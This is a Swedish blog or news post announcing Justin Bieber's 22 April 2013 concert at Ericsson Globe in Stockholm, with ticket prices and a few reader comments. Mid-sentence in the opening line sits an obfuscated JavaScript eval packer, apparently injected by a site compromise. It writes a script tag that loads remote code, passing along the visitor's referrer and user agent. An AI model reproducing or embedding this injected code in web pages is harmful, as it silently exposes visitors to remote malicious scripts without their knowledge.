Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

JUSTIN BIEBER KOMMER TILL SVERIGE

JUSTIN BIEBER KOMMER TILL SVERIGE
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffkaa|var|u0026u|referrer|khbrn||js|php’.split(’|’),0,{}))
22 april står Justin Bieber på Ericsson Globes scen i Stockholm.

Med 15 miljoner sålda album världen över, 44 miljoner facebook-fans, 24 miljoner följare på Twitter och över 2,9 miljarder views på YouTube, är det väl knappast någon överdrift att säga att Justin Bieber fullkomligt dominerat popkulturen och sociala medier de senaste två åren. Nya albumet ”Believe” gick direkt in som #1 på albumlistan i Sverige och i hela 29 andra länder. Nu får alla svenska Beliebers ytterligare anledning att jubla. Den 22 april 2013 slås dörrarna till Ericsson Globe upp för den första Justin Bieber-konserten i Sverige någonsin.

Biljetter till Justin Bieber släpps den 6 juli. Biljettpris 350 till 850kr + serviceavgift. Säljs via www.ticnet.se, 077-170 70 70, alla Ticnet-ombud samt via www.globearenas.se, 077-131 00 00

Comments

 1. Johannes

  Äntligen. Har längtat så otroligt mycket!!!

 2. Elin

  Har han varit här någon gång innan?

  • Olle

   Svaret finns i texten om du tittar noga 😛